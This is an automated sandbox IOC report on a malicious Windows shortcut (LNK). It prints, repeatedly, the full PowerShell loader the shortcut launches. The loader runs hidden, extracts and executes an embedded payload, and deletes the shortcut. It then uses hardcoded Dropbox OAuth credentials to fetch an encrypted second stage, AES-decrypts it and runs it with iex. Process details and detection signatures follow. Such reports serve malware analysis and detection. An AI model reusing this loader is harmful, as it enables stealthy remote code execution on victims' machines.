Automated Malware Analysis IOC Report for

Files

File Path

Type

Processes

Path

Cmdline

Malicious

C:\Windows\System32\cmd.exe

"C:\Windows\system32\cmd.exe" /c powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\user\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x0010F27C) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$path1 = 'C:\Users\user\AppData\Local\Temp\tmp' + (Get-Random) + '.vbs';$len1 = 1057248;$len2 = 1110496;$len3 = 1110496;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function AESDecrypt { param ( [Byte[]]$bytes,[String]$pass=\"pa55w0rd\") $InputStream = New-Object System.IO.MemoryStream(,$bytes);$OutputStream = New-Object System.IO.MemoryStream;$Salt = New-Object Byte[](32);$BytesRead = $InputStream.Read($Salt, 0, $Salt.Length);if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($pass, $Salt);$AESKey = $PBKDF2.GetBytes(32);$AESIV = $PBKDF2.GetBytes(16);$AES = New-Object Security.Cryptography.AesManaged;$Dec = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($InputStream, $Dec, [System.Security.Cryptography.CryptoStreamMode]::Read);$CryptoStream.CopyTo($OutputStream);$OutputStream.Dispose();return $OutputStream.ToArray();} $clientID = \"oj8kd1lzqrw7v3m\";$clientSecret = \"vwp27gytekx9jfq\";$refreshToken = \"wR3_ULk2OicAAAAAAAAAAV81-_COcFPa8SN0V5K-ZPTYB-BVIH5E1c4_fqLOCC_u\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dropboxapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dropboxapi.com/2/files/download\";$remoteFilePath = \"/step5/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dropbox-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();$pass = \"pa55w0rd\";if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();$dec_bytes = AESDecrypt -bytes $enc_bytes -pass $pass;$newString = [System.Text.Encoding]::UTF8.GetString($dec_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();"

Details

Is windows:	true
Is dropped:	false
PID:	3192
Target ID:	1
Parent PID:	4004
Name:	cmd.exe
Class:	cmd
Path:	C:\Windows\System32\cmd.exe
Commandline:	"C:\Windows\system32\cmd.exe" /c powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\user\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x0010F27C) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$path1 = 'C:\Users\user\AppData\Local\Temp\tmp' + (Get-Random) + '.vbs';$len1 = 1057248;$len2 = 1110496;$len3 = 1110496;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function AESDecrypt { param ( [Byte[]]$bytes,[String]$pass=\"pa55w0rd\") $InputStream = New-Object System.IO.MemoryStream(,$bytes);$OutputStream = New-Object System.IO.MemoryStream;$Salt = New-Object Byte[](32);$BytesRead = $InputStream.Read($Salt, 0, $Salt.Length);if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($pass, $Salt);$AESKey = $PBKDF2.GetBytes(32);$AESIV = $PBKDF2.GetBytes(16);$AES = New-Object Security.Cryptography.AesManaged;$Dec = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($InputStream, $Dec, [System.Security.Cryptography.CryptoStreamMode]::Read);$CryptoStream.CopyTo($OutputStream);$OutputStream.Dispose();return $OutputStream.ToArray();} $clientID = \"oj8kd1lzqrw7v3m\";$clientSecret = \"vwp27gytekx9jfq\";$refreshToken = \"wR3_ULk2OicAAAAAAAAAAV81-_COcFPa8SN0V5K-ZPTYB-BVIH5E1c4_fqLOCC_u\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dropboxapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dropboxapi.com/2/files/download\";$remoteFilePath = \"/step5/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dropbox-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();$pass = \"pa55w0rd\";if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();$dec_bytes = AESDecrypt -bytes $enc_bytes -pass $pass;$newString = [System.Text.Encoding]::UTF8.GetString($dec_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();"
Size:	289792
MD5:	8A2122E8162DBEF04694B9C3E0B6CDEE
Time:	10:32:58
Date:	28/03/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff743820000
Modulesize:	421888
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Powershell download payload from hardcoded c2 list	Spreading
Windows shortcut file (LNK) starts blacklisted processes	Persistence and Installation Behavior	Process Discovery
Sigma detected: Invoke-Obfuscation STDIN+ Launcher	System Summary
Sigma detected: Potential PowerShell Command Line Obfuscation	System Summary
Sigma detected: Suspicious PowerShell IEX Execution Patterns	System Summary
Sigma detected: Suspicious Script Execution From Temp Folder	System Summary
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Usage Of Web Request Commands And Cmdlets	System Summary
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Executes visual basic scripts	System Summary	Scripting
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\user\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x0010F27C) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$path1 = 'C:\Users\user\AppData\Local\Temp\tmp' + (Get-Random) + '.vbs';$len1 = 1057248;$len2 = 1110496;$len3 = 1110496;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function AESDecrypt { param ( [Byte[]]$bytes,[String]$pass=\"pa55w0rd\") $InputStream = New-Object System.IO.MemoryStream(,$bytes);$OutputStream = New-Object System.IO.MemoryStream;$Salt = New-Object Byte[](32);$BytesRead = $InputStream.Read($Salt, 0, $Salt.Length);if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($pass, $Salt);$AESKey = $PBKDF2.GetBytes(32);$AESIV = $PBKDF2.GetBytes(16);$AES = New-Object Security.Cryptography.AesManaged;$Dec = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($InputStream, $Dec, [System.Security.Cryptography.CryptoStreamMode]::Read);$CryptoStream.CopyTo($OutputStream);$OutputStream.Dispose();return $OutputStream.ToArray();} $clientID = \"oj8kd1lzqrw7v3m\";$clientSecret = \"vwp27gytekx9jfq\";$refreshToken = \"wR3_ULk2OicAAAAAAAAAAV81-_COcFPa8SN0V5K-ZPTYB-BVIH5E1c4_fqLOCC_u\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dropboxapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dropboxapi.com/2/files/download\";$remoteFilePath = \"/step5/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dropbox-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();$pass = \"pa55w0rd\";if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();$dec_bytes = AESDecrypt -bytes $enc_bytes -pass $pass;$newString = [System.Text.Encoding]::UTF8.GetString($dec_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();"

Details

Is windows:	true
Is dropped:	false
PID:	3916
Target ID:	3
Parent PID:	3192
Name:	powershell.exe
Class:	powershell
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Commandline:	powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\user\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x0010F27C) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$path1 = 'C:\Users\user\AppData\Local\Temp\tmp' + (Get-Random) + '.vbs';$len1 = 1057248;$len2 = 1110496;$len3 = 1110496;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function AESDecrypt { param ( [Byte[]]$bytes,[String]$pass=\"pa55w0rd\") $InputStream = New-Object System.IO.MemoryStream(,$bytes);$OutputStream = New-Object System.IO.MemoryStream;$Salt = New-Object Byte[](32);$BytesRead = $InputStream.Read($Salt, 0, $Salt.Length);if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($pass, $Salt);$AESKey = $PBKDF2.GetBytes(32);$AESIV = $PBKDF2.GetBytes(16);$AES = New-Object Security.Cryptography.AesManaged;$Dec = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($InputStream, $Dec, [System.Security.Cryptography.CryptoStreamMode]::Read);$CryptoStream.CopyTo($OutputStream);$OutputStream.Dispose();return $OutputStream.ToArray();} $clientID = \"oj8kd1lzqrw7v3m\";$clientSecret = \"vwp27gytekx9jfq\";$refreshToken = \"wR3_ULk2OicAAAAAAAAAAV81-_COcFPa8SN0V5K-ZPTYB-BVIH5E1c4_fqLOCC_u\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dropboxapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dropboxapi.com/2/files/download\";$remoteFilePath = \"/step5/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dropbox-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();$pass = \"pa55w0rd\";if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();$dec_bytes = AESDecrypt -bytes $enc_bytes -pass $pass;$newString = [System.Text.Encoding]::UTF8.GetString($dec_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();"
Size:	452608
MD5:	04029E121A0CFA5991749937DD22A1D9
Time:	10:32:58
Date:	28/03/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff6e3d50000
Modulesize:	462848
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Windows shortcut file (LNK) starts blacklisted processes	Persistence and Installation Behavior	Process Discovery
Sigma detected: Potential PowerShell Command Line Obfuscation	System Summary
Sigma detected: Suspicious Script Execution From Temp Folder	System Summary
Suspicious powershell command line found	Data Obfuscation	PowerShell
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection
Binary contains paths to debug symbols	Compliance, System Summary

C:\Windows\System32\cmd.exe

Details

Is windows:	true
Is dropped:	false
PID:	5476
Target ID:	4
Parent PID:	3916
Name:	cmd.exe
Class:	cmd
Path:	C:\Windows\System32\cmd.exe
Commandline:	"C:\Windows\system32\cmd.exe" /c powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\user\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x0010F27C) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$path1 = 'C:\Users\user\AppData\Local\Temp\tmp' + (Get-Random) + '.vbs';$len1 = 1057248;$len2 = 1110496;$len3 = 1110496;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function AESDecrypt { param ( [Byte[]]$bytes,[String]$pass=\"pa55w0rd\") $InputStream = New-Object System.IO.MemoryStream(,$bytes);$OutputStream = New-Object System.IO.MemoryStream;$Salt = New-Object Byte[](32);$BytesRead = $InputStream.Read($Salt, 0, $Salt.Length);if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($pass, $Salt);$AESKey = $PBKDF2.GetBytes(32);$AESIV = $PBKDF2.GetBytes(16);$AES = New-Object Security.Cryptography.AesManaged;$Dec = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($InputStream, $Dec, [System.Security.Cryptography.CryptoStreamMode]::Read);$CryptoStream.CopyTo($OutputStream);$OutputStream.Dispose();return $OutputStream.ToArray();} $clientID = \"oj8kd1lzqrw7v3m\";$clientSecret = \"vwp27gytekx9jfq\";$refreshToken = \"wR3_ULk2OicAAAAAAAAAAV81-_COcFPa8SN0V5K-ZPTYB-BVIH5E1c4_fqLOCC_u\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dropboxapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dropboxapi.com/2/files/download\";$remoteFilePath = \"/step5/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dropbox-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();$pass = \"pa55w0rd\";if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();$dec_bytes = AESDecrypt -bytes $enc_bytes -pass $pass;$newString = [System.Text.Encoding]::UTF8.GetString($dec_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();"
Size:	289792
MD5:	8A2122E8162DBEF04694B9C3E0B6CDEE
Time:	10:33:02
Date:	28/03/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff743820000
Modulesize:	421888
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Powershell download payload from hardcoded c2 list	Spreading
Windows shortcut file (LNK) starts blacklisted processes	Persistence and Installation Behavior	Process Discovery
Sigma detected: Invoke-Obfuscation STDIN+ Launcher	System Summary
Sigma detected: Potential PowerShell Command Line Obfuscation	System Summary
Sigma detected: Suspicious PowerShell IEX Execution Patterns	System Summary
Sigma detected: Suspicious Script Execution From Temp Folder	System Summary
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Usage Of Web Request Commands And Cmdlets	System Summary
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Executes visual basic scripts	System Summary	Scripting
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Details

Is windows:	true
Is dropped:	false
PID:	3652
Target ID:	6
Parent PID:	5476
Name:	powershell.exe
Class:	powershell
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Commandline:	powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\user\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x0010F27C) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$path1 = 'C:\Users\user\AppData\Local\Temp\tmp' + (Get-Random) + '.vbs';$len1 = 1057248;$len2 = 1110496;$len3 = 1110496;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function AESDecrypt { param ( [Byte[]]$bytes,[String]$pass=\"pa55w0rd\") $InputStream = New-Object System.IO.MemoryStream(,$bytes);$OutputStream = New-Object System.IO.MemoryStream;$Salt = New-Object Byte[](32);$BytesRead = $InputStream.Read($Salt, 0, $Salt.Length);if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($pass, $Salt);$AESKey = $PBKDF2.GetBytes(32);$AESIV = $PBKDF2.GetBytes(16);$AES = New-Object Security.Cryptography.AesManaged;$Dec = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($InputStream, $Dec, [System.Security.Cryptography.CryptoStreamMode]::Read);$CryptoStream.CopyTo($OutputStream);$OutputStream.Dispose();return $OutputStream.ToArray();} $clientID = \"oj8kd1lzqrw7v3m\";$clientSecret = \"vwp27gytekx9jfq\";$refreshToken = \"wR3_ULk2OicAAAAAAAAAAV81-_COcFPa8SN0V5K-ZPTYB-BVIH5E1c4_fqLOCC_u\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dropboxapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dropboxapi.com/2/files/download\";$remoteFilePath = \"/step5/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dropbox-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();$pass = \"pa55w0rd\";if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();$dec_bytes = AESDecrypt -bytes $enc_bytes -pass $pass;$newString = [System.Text.Encoding]::UTF8.GetString($dec_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();"
Size:	452608
MD5:	04029E121A0CFA5991749937DD22A1D9
Time:	10:33:02
Date:	28/03/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff6e3d50000
Modulesize:	462848
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Windows shortcut file (LNK) starts blacklisted processes	Persistence and Installation Behavior	Process Discovery
Sigma detected: Potential PowerShell Command Line Obfuscation	System Summary
Sigma detected: Suspicious Script Execution From Temp Folder	System Summary
Suspicious powershell command line found	Data Obfuscation	PowerShell
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection
Binary contains paths to debug symbols	Compliance, System Summary

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Details

Is windows:	true
Is dropped:	false
PID:	6536
Target ID:	2
Parent PID:	3192
Name:	conhost.exe
Path:	C:\Windows\System32\conhost.exe
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Size:	862208
MD5:	0D698AF330FD17BEE3BF90011D49251D
Time:	10:32:58
Date:	28/03/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff66e660000
Modulesize:	892928
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Details

Is windows:	true
Is dropped:	false
PID:	2136
Target ID:	5
Parent PID:	5476
Name:	conhost.exe
Path:	C:\Windows\System32\conhost.exe
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Size:	862208
MD5:	0D698AF330FD17BEE3BF90011D49251D
Time:	10:33:02
Date:	28/03/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff66e660000
Modulesize:	892928
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE"

Details

Is windows:	true
Is dropped:	false
PID:	3184
Target ID:	8
Parent PID:	3652
Name:	EXCEL.EXE
Class:	excel
Path:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
Commandline:	"C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE"
Size:	53161064
MD5:	4A871771235598812032C822E6F68F19
Time:	10:33:07
Date:	28/03/2024
Reason:	newprocess
Reputation:	moderate
Is admin:	true
Is elevated:	true
Modulebase:	0xaf0000
Modulesize:	53231616
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Excel Network Connections	System Summary
Sigma detected: Suspicious Office Outbound Connections	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS

Details

Is windows:	true
Is dropped:	false
PID:	6672
Target ID:	10
Parent PID:	632
Name:	svchost.exe
Path:	C:\Windows\System32\svchost.exe
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Size:	55320
MD5:	B7F884C1B74A263F746EE12A5F7C9F6A
Time:	10:33:09
Date:	28/03/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff7403e0000
Modulesize:	65536
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Windows Processes Suspicious Parent Directory	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

Details

Is windows:	true
Is dropped:	false
PID:	3384
Target ID:	13
Parent PID:	3184
Name:	splwow64.exe
Path:	C:\Windows\splwow64.exe
Commandline:	C:\Windows\splwow64.exe 12288
Size:	163840
MD5:	77DE7761B037061C7C112FD3C5B91E73
Time:	10:34:12
Date:	28/03/2024
Reason:	newprocess
Reputation:	moderate
Is admin:	true
Is elevated:	true
